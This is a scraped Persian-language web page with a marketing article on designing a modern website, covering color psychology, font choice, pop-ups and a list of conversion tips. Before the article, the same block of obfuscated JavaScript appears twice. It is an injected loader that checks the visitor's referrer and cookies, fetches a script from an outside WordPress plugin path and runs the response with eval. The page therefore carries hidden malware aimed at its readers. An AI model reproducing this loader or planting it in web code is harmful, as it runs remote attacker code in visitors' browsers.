;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

چگونه یک وبسایت مدرن طراحی کنیم؟

طراحی سایت مدرن

بر کسی پوشیده نیست که طراحی سایت مدرن و منحصر به فرد که کاربر پسند باشد نخستین و مهم ترین گام در به دست آوردن موفقیت در عرصه دیجیتال مارکتینگ یا همان بازاریابی آنلاین است. پیش از آنکه بخواهیم نکات تکنیکی و فنی لازم جهت بهترین طراحی وب سایت را بیان کنیم ابتدا تعریفی کوتاه از وب سایت خوب و موثر داشته باشیم. در اینجا منظور ما سایتی است که تمامی اطلاعات لازم در مورد کالا و خدمات ما را در خود جای داده باشد البته نه به این صورت که فقط محصول و سرویس های مورد نظر ما را معرفی کند، بلکه به صورتی باشد که این ارائه اطلاعات منجر به خرید محصول و خدمت توسط مشتری بشود.

این سایت ها برای فروش یک یا چند محصول طراحی خواهند شد و اطلاعاتی که در اختیار بازدید کننده قرار می گیرد کاملا در ارتباط با این محصولات است و سبب توضیح در مورد خدمات و امکانات می باشد.

داشتن یک وب سایت سرآمد و نمونه

توجه به نحوه طراحی سایت و سپس تولید محتوا اهمیت زیادی دارد. در واقع وب سایت بر این دو محور استوار شده است.در ابتدا سایت طراحی می شود و سپس نوبت به مدیریت آن می رسد.اگر پروژه ساخت یک فروشگاه را در نظر بگیریم، ابتدا ساختمان آن طراحی و بنا می شود. سپس نوبت به چیدمان داخلی و تهیه محصولات و اجناس می رسد. در رابطه با وب سایت نیز وضعیت به همین صورت است. طراحی سایت در حکم همان ساختمان فروشگاه می باشد و سپس تهیه اجناس و کالاها با تولید محتوا انجام می شود.

براساس آنچه گفته شد، برای داشتن یک وب سایت نمونه، باید به هر دو مرحله طراحی و سپس تولید محتوای سایت توجه شود.

مرحله طراحی سایت مدرن

در مرحله طراحی سایت لازم است تا تمامی مواردی که موجب آزار کاربران می شود، حذف شوند. همچنین توجه به برخی از المان ها در طراحی سایت، نهایتا موجب سرآمد شدن آن می شود. در زیر به این المان ها می پردازیم.

تاثیر روانشناسی رنگ در طراحی سایت مدرن

در طراحی سایت حرفه ای ابتدا باید رنگ مناسب انتخاب شود. رنگ پس زمینه سایت، رنگ فونت ها، استفاده از تصاویر هماهنگ با رنگ زمینه و …. از جمله مواردی است که در زمان انتخاب رنگ اهمیت پیدا می کند. انتخاب رنگ باید متناسب با فعالیت، موضوع و هدف سایت باشد.

استفاده از فونت مناسب

در زمان طراحی سایت باید به فونت توجه زیادی شود. در واقع بازدیدکننده برای مطالعه محتوا وارد سایت می شود، بنابراین فونت آن اهمیت زیادی دارد. بهتر است از فونت های خوانا، مرتب و زیباتر استفاده شود و در عین حال سایز آنهم متناسب باشد.

فونت های بیش از حد بزرگ تنها سایت را پر می کنند و ناشکیب هستند. همینطور فونت ریز موجب آزار چشم بیننده می شود. بنابراین باید فونت سایت متوسط و برای هدرها از فونت بزرگتر استفاده شود.

لینک های چشمک زن و pop upهای ویندوز

pop up های ویندوزی و لینک های چشمک زن به منظور جلب توجه بازدیدکننده ها استفاده می شوند. بنابراین بهتر است این آیتم ها بر روی موارد مهمی قرار داده شود که نیاز به توجه بیشتری دارند. اما در استفاده از لینک های چشمک زن نباید زیاده روی شود. زیرا موجب مزاحمت برای بازدیدکننده می شود.

مزایای یک سایت موثر :

 1. از قرار دادن تصاویر با حجم بالا در وب سایت که باعث دیر لود شدن صفحه شده و ترافیک بیشتری از کاربر مصرف می کند خودداری کنید
 2. حتما از روانشناسی رنگ ها بهره ببرید و رنگ مرتبط با محصولات خود را انتخاب کنید.
 3. با شلوغ بازی و تغییر رنگ های ناگهانی و بی مورد تمرکز مشتری را برهم نزنید
 4. حتی الامکان از منتقل کردن کاربر به صفحات دیگر خودداری کنید
 5. بیشتر تمرکزتان را روی محتوای سایت و فروش محصول و جذب مشتری قرار بدهید.
 6. گزینه هایی مانند «هم اکنون سفارش خود را ثبت کنید» و «هم اینک خرید کنید» را در مکان مناسب با رنگ های قابل دید و واضح استفاده کنید.
 7. طبق اصول ثابت شده روانشناسی، کمتر از متون نوشتاری و به ویژه متن های بلند و طولانی استفاده کنید.
 8. پیرو مورد قبل در کنار متون از اینفوگرافی های جذاب و متنوع استفاده کنید که بیشتر مورد توجه کاربران است.
 9. به طورکلی برای دادن اطلاعات و توضیح دادن امکانات بیشتر از تصاویر استفاده شود و حتی الامکان از متن های بلند و طولانی استفاده نکنید.
 10. خیلی زیرکانه برتری های محصولات خود را به رخ بکشید و روی آن ها مانور بدهید.
 11. توجه داشته باشید که شماره تلفن های تماس و راه های ارتباطی همواره در دسترس باشند.
 12. تخفیف ها و پیشنهادات ویژه را در حوالی مکان قیمت محصول قرار بدهید.
 13. حتما افتخارات مجموعه یا خود محصول و یا حتی شرکت تولید کننده محصول را در مکانی مناسب و قابل دید بگذارید.
 14. برای ثبت سفارش از فرم های ساده و مختصر یا تماس تلفنی استفاده کنید
 15. حتما هزینه سفارش را بلافاصله با پرداخت آنلاین دریافت کنید.
 16. بعد از پرداخت مبلغ مورد نظر توسط مشتری ایشان را به صفحه ای هدایت کنید که از خرید انجام شده و وجه پرداخت شده احساس امنیت کرده و بداند که شما تا دریافت محصول او را پشتیبانی خواهید کرد.

امیدوارم تحلیل ها و نکات بیان شده گره گشای کار شما در طراحی وب سایتی بی نظیر و فوق العاده برای موفقیت در کسب و کارتان باشد اما هیچ گاه این نکته را فراموش نکنید که در کنار طراحی گرافیکی زیبا، محتوا و اطلاعات خوب و مستحکم، لازم و ضروریست.

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای